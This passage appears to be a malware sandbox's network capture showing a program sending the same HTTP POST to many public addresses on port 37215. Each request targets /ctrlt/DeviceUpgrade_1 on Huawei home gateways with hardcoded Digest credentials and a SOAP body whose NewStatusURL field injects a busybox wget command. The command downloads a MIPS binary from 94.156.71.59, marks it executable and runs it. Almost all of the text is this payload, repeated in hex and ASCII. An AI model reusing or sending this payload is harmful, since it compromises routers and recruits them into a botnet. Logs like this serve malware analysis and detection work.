                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            964192.168.2.1333470156.177.178.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.384932041 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            965192.168.2.1337776156.52.32.11237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.387057066 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            966192.168.2.133932041.73.238.9237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.390079975 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            967192.168.2.1357162197.251.34.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.392121077 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            968192.168.2.1347836197.17.18.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.394381046 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            969192.168.2.1354002197.71.231.4037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.396250010 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            970192.168.2.1341666197.169.39.12637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.398030043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            971192.168.2.1343386197.40.159.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.399524927 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            972192.168.2.1333572197.234.41.20437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.401449919 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            973192.168.2.1359936197.38.189.14037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.403423071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
